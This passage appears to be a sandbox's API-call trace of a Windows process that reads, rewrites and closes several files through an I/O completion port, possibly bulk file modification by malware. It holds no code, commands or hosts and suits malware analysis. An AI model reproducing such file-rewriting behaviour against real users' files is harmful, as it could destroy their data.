lpOverlapped=0x347f79c) returned 1 [0156.632] ReadFile (in: hFile=0x1bc, lpBuffer=0x2b70124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x347f798, lpOverlapped=0x2b70020 | out: lpBuffer=0x2b70124*, lpNumberOfBytesRead=0x347f798*=0x0, lpOverlapped=0x2b70020) returned 1 [0156.632] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c) returned 1 [0156.632] WriteFile (in: hFile=0x19c, lpBuffer=0x710124*, nNumberOfBytesToWrite=0x14761, lpNumberOfBytesWritten=0x347f798, lpOverlapped=0x710020 | out: lpBuffer=0x710124*, lpNumberOfBytesWritten=0x347f798, lpOverlapped=0x710020) returned 1 [0156.643] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c) returned 1 [0156.643] ReadFile (in: hFile=0x19c, lpBuffer=0x710124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x347f798, lpOverlapped=0x710020 | out: lpBuffer=0x710124, lpNumberOfBytesRead=0x347f798*=0x0, lpOverlapped=0x710020) returned 0x0 [0156.643] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c) returned 0 [0156.643] PostQueuedCompletionStatus (CompletionPort=0xd8, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x710020) returned 1 [0156.643] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c) returned 1 [0156.643] WriteFile (in: hFile=0x19c, lpBuffer=0x710094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x347f798, lpOverlapped=0x710020 | out: lpBuffer=0x710094*, lpNumberOfBytesWritten=0x347f798, lpOverlapped=0x710020) returned 1 [0156.662] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c) returned 1 [0156.662] ReadFile (in: hFile=0x1f0, lpBuffer=0x3510124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x347f798, lpOverlapped=0x3510020 | out: lpBuffer=0x3510124*, lpNumberOfBytesRead=0x347f798*=0x0, lpOverlapped=0x3510020) returned 1 [0156.662] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c) returned 1 [0156.662] CloseHandle (hObject=0x19c) returned 1 [0156.670] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x710020) returned 1 [0156.671] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c) returned 1 [0157.490] WriteFile (in: hFile=0x1bc, lpBuffer=0x3510124*, nNumberOfBytesToWrite=0xac49, lpNumberOfBytesWritten=0x347f798, lpOverlapped=0x3510020 | out: lpBuffer=0x3510124*, lpNumberOfBytesWritten=0x347f798, lpOverlapped=0x3510020) returned 1 [0157.527] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c) returned 1 [0157.527] ReadFile (in: hFile=0x1bc, lpBuffer=0x3510124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x347f798, lpOverlapped=0x3510020 | out: lpBuffer=0x3510124, lpNumberOfBytesRead=0x347f798*=0x0, lpOverlapped=0x3510020) returned 0x0 [0157.527] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c) returned 0 [0157.527] PostQueuedCompletionStatus (CompletionPort=0xd8, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x3510020) returned 1 [0157.527] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c) returned 1 [0157.527] WriteFile (in: hFile=0x1bc, lpBuffer=0x3510094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x347f798, lpOverlapped=0x3510020 | out: lpBuffer=0x3510094*, lpNumberOfBytesWritten=0x347f798, lpOverlapped=0x3510020) returned 1 [0157.533] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c) returned 1 [0157.534] CloseHandle (hObject=0x1bc) returned 1 [0157.553] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3510020) returned 1 [0157.556] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c) returned 1 [0157.733] ReadFile (in: hFile=0x1bc, lpBuffer=0x710124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x347f798, lpOverlapped=0x710020 | out: lpBuffer=0x710124*, lpNumberOfBytesRead=0x347f798*=0x0, lpOverlapped=0x710020) returned 1 [0157.776] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c) returned 1 [0157.776] ReadFile (in: hFile=0x198, lpBuffer=0x2b70124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x347f798, lpOverlapped=0x2b70020 | out: lpBuffer=0x2b70124*, lpNumberOfBytesRead=0x347f798*=0x0, lpOverlapped=0x2b70020) returned 1 [0157.777] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c) returned 1 [0157.777] ReadFile (in: hFile=0x1cc, lpBuffer=0x3510124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x347f798, lpOverlapped=0x3510020 | out: lpBuffer=0x3510124*, lpNumberOfBytesRead=0x347f798*=0x0, lpOverlapped=0x3510020) returned 1 [0157.777] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c) returned 1 [0157.777] ReadFile (in: hFile=0x1a0, lpBuffer=0x3630124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x347f798, lpOverlapped=0x3630020 | out: lpBuffer=0x3630124*, lpNumberOfBytesRead=0x347f798*=0x0, lpOverlapped=0x3630020) returned 1 [0157.777] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c) returned 1 [0157.777] ReadFile (in: hFile=0x1e0, lpBuffer=0x3750124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x347f798, lpOverlapped=0x3750020 | out: lpBuffer=0x3750124*, lpNumberOfBytesRead=0x347f798*=0x0, lpOverlapped=0x3750020) returned 1 [0157.778] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c) returned 1 [0157.778] WriteFile (in: hFile=0x1bc, lpBuffer=0x710124*, nNumberOfBytesToWrite=0x17a4a, lpNumberOfBytesWritten=0x347f798, lpOverlapped=0x710020 | out: lpBuffer=0x710124*, lpNumberOfBytesWritten=0x347f798, lpOverlapped=0x710020) returned 1 [0157.779] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c) returned 1 [0157.779] WriteFile (in: hFile=0x198, lpBuffer=0x2b70124*, nNumberOfBytesToWrite=0x10a5d, lpNumberOfBytesWritten=0x347f798, lpOverlapped=0x2b70020 | out: lpBuffer=0x2b70124*, lpNumberOfBytesWritten=0x347f798, lpOverlapped=0x2b70020) returned 1 [0157.779] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c) returned 1 [0157.779] WriteFile (in: hFile=0x1cc, lpBuffer=0x3510124*, nNumberOfBytesToWrite=0xda4e, lpNumberOfBytesWritten=0x347f798, lpOverlapped=0x3510020 | out: lpBuffer=0x3510124*, lpNumberOfBytesWritten=0x347f798, lpOverlapped=0x3510020) returned 1 [0157.780] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c) returned 1 [0157.780] WriteFile (in: hFile=0x1a0, lpBuffer=0x3630124*, nNumberOfBytesToWrite=0x64f3, lpNumberOfBytesWritten=0x347f798, lpOverlapped=0x3630020 | out: lpBuffer=0x3630124*, lpNumberOfBytesWritten=0x347f798, lpOverlapped=0x3630020) returned 1 [0157.780] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c) returned 1 [0157.780] WriteFile (in: hFile=0x1e0, lpBuffer=0x3750124*, nNumberOfBytesToWrite=0xb419, lpNumberOfBytesWritten=0x347f798, lpOverlapped=0x3750020 | out: lpBuffer=0x3750124*, lpNumberOfBytesWritten=0x347f798, lpOverlapped=0x3750020) returned 1 [0157.780] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c) returned 1 [0157.780] ReadFile (in: hFile=0x1bc, lpBuffer=0x710124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x347f798, lpOverlapped=0x710020 | out: lpBuffer=0x710124, lpNumberOfBytesRead=0x347f798*=0x0, lpOverlapped=0x710020) returned 0x0 [0157.780] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c) returned 1 [0157.781] ReadFile (in: hFile=0x198, lpBuffer=0x2b70124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x347f798, lpOverlapped=0x2b70020 | out: lpBuffer=0x2b70124, lpNumberOfBytesRead=0x347f798*=0x0, lpOverlapped=0x2b70020) returned 0x0 [0157.781] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c) returned 1 [0157.781] ReadFile (in: hFile=0x1cc, lpBuffer=0x3510124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x347f798, lpOverlapped=0x3510020 | out: lpBuffer=0x3510124, lpNumberOfBytesRead=0x347f798*=0x0, lpOverlapped=0x3510020) returned 0x0 [0157.781] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c) returned 1 [0157.781] ReadFile (in: hFile=0x1a0, lpBuffer=0x3630124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x347f798, lpOverlapped=0x3630020 | out: lpBuffer=0x3630124, lpNumberOfBytesRead=0x347f798*=0x0, lpOverlapped=0x3630020) returned 0x0 [0157.781] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c) returned 1 [0157.781] ReadFile (in: hFile=0x1e0, lpBuffer=0x3750124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x347f798, lpOverlapped=0x3750020 | out: lpBuffer=0x3750124, lpNumberOfBytesRead=0x347f798*=0x0, lpOverlapped=0x3750020) returned 0x0 [0157.781] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c) returned 0 [0157.781] PostQueuedCompletionStatus (CompletionPort=0xd8, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x710020) returned 1 [0157.781] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c) returned 0 [0157.781] PostQueuedCompletionStatus (CompletionPort=0xd8, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x2b70020) returned 1 [0157.781] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c) returned 0 [0157.781] PostQueuedCompletionStatus (CompletionPort=0xd8, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x3510020) returned 1 [0157.781] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c) returned 0 [0157.781] PostQueuedCompletionStatus (CompletionPort=0xd8, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x3630020) returned 1 [0157.781] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c) returned 0 [0157.781] PostQueuedCompletionStatus (CompletionPort=0xd8, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x3750020) returned 1 [0157.782] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c) returned 1 [0157.782] WriteFile (in: hFile=0x1bc, lpBuffer=0x710094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x347f798, lpOverlapped=0x710020 | out: lpBuffer=0x710094*, lpNumberOfBytesWritten=0x347f798, lpOverlapped=0x710020) returned 1 [0157.782] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c) returned 1 [0157.782] WriteFile (in: hFile=0x198, lpBuffer=0x2b70094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x347f798, lpOverlapped=0x2b70020 | out: lpBuffer=0x2b70094*, lpNumberOfBytesWritten=0x347f798, lpOverlapped=0x2b70020) returned 1 [0157.782] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c) returned 1 [0157.782] WriteFile (in: hFile=0x1cc, lpBuffer=0x3510094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x347f798, lpOverlapped=0x3510020 | out: lpBuffer=0x3510094*, lpNumberOfBytesWritten=0x347f798, lpOverlapped=0x3510020) returned 1 [0157.782] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c) returned 1 [0157.782] WriteFile (in: hFile=0x1a0, lpBuffer=0x3630094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x347f798, lpOverlapped=0x3630020 | out: lpBuffer=0x3630094*, lpNumberOfBytesWritten=0x347f798, lpOverlapped=0x3630020) returned 1 [0157.782] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c) returned 1 [0157.782] WriteFile (in: hFile=0x1e0, lpBuffer=0x3750094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x347f798, lpOverlapped=0x3750020 | out: lpBuffer=0x3750094*, lpNumberOfBytesWritten=0x347f798, lpOverlapped=0x3750020) returned 1 [0157.782] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c) returned 1 [0157.782] CloseHandle (hObject=0x1bc) returned 1 [0157.784] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x710020) returned 1 [0157.784] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c) returned 1 [0157.784] CloseHandle (hObject=0x198) returned 1 [0157.785] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x2b70020) returned 1 [0157.788] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c) returned 1 [0157.788] CloseHandle (hObject=0x1cc) returned 1 [0157.789] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3510020) returned 1 [0157.792] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c) returned 1 [0157.792] CloseHandle (hObject=0x1a0) returned 1 [0157.793] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3630020) returned 1 [0157.796] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c) returned 1 [0157.796] CloseHandle (hObject=0x1e0) returned 1 [0157.797] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3750020) returned 1 [0157.800] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c) returned 1 [0158.085] ReadFile (in: hFile=0x1c0, lpBuffer=0x2690124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x347f798, lpOverlapped=0x2690020 | out: lpBuffer=0x2690124*, lpNumberOfBytesRead=0x347f798*=0x0, lpOverlapped=0x2690020) returned 1 [0158.086] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c) returned 1 [0158.086] ReadFile (in: hFile=0x1d8, lpBuffer=0x3480124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x347f798, lpOverlapped=0x3480020 | out: lpBuffer=0x3480124*, lpNumberOfBytesRead=0x347f798*=0x0, lpOverlapped=0x3480020) returned 1 [0158.086] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c) returned 1 [0158.086] ReadFile (in: hFile=0x1e0, lpBuffer=0x35a0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x347f798, lpOverlapped=0x35a0020 | out: lpBuffer=0x35a0124*, lpNumberOfBytesRead=0x347f798*=0x0, lpOverlapped=0x35a0020) returned 1 [0158.086] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c) returned 1 [0158.086] ReadFile (in: hFile=0x198, lpBuffer=0x36c0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x347f798, lpOverlapped=0x36c0020 | out: lpBuffer=0x36c0124*, lpNumberOfBytesRead=0x347f798*=0x0, lpOverlapped=0x36c0020) returned 1 [0158.086] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c) returned 1 [0158.087] WriteFile (in: hFile=0x1c0, lpBuffer=0x2690124*, nNumberOfBytesToWrite=0x15b86, lpNumberOfBytesWritten=0x347f798, lpOverlapped=0x2690020 | out: lpBuffer=0x2690124*, lpNumberOfBytesWritten=0x347f798, lpOverlapped=0x2690020) returned 1 [0158.087] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c) returned 1 [0158.087] WriteFile (in: hFile=0x1d8, lpBuffer=0x3480124*, nNumberOfBytesToWrite=0xc49, lpNumberOfBytesWritten=0x347f798, lpOverlapped=0x3480020 | out: lpBuffer=0x3480124*, lpNumberOfBytesWritten=0x347f798, lpOverlapped=0x3480020) returned 1 [0158.087] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c) returned 1 [0158.088] WriteFile (in: hFile=0x1e0, lpBuffer=0x35a0124*, nNumberOfBytesToWrite=0x72cb, lpNumberOfBytesWritten=0x347f798, lpOverlapped=0x35a0020 | out: lpBuffer=0x35a0124*, lpNumberOfBytesWritten=0x347f798, lpOverlapped=0x35a0020) returned 1 [0158.088] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c) returned 1 [0158.088] WriteFile (in: hFile=0x198, lpBuffer=0x36c0124*, nNumberOfBytesToWrite=0xab16, lpNumberOfBytesWritten=0x347f798, lpOverlapped=0x36c0020 | out: lpBuffer=0x36c0124*, lpNumberOfBytesWritten=0x347f798, lpOverlapped=0x36c0020) returned 1 [0158.088] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c) returned 1 [0158.088] ReadFile (in: hFile=0x1c0, lpBuffer=0x2690124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x347f798, lpOverlapped=0x2690020 | out: lpBuffer=0x2690124, lpNumberOfBytesRead=0x347f798*=0x0, lpOverlapped=0x2690020) returned 0x0 [0158.089] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c) returned 1 [0158.089] ReadFile (in: hFile=0x1d8, lpBuffer=0x3480124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x347f798, lpOverlapped=0x3480020 | out: lpBuffer=0x3480124, lpNumberOfBytesRead=0x347f798*=0x0, lpOverlapped=0x3480020) returned 0x0 [0158.089] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c, dwMilliseconds=0xffffffff | out: 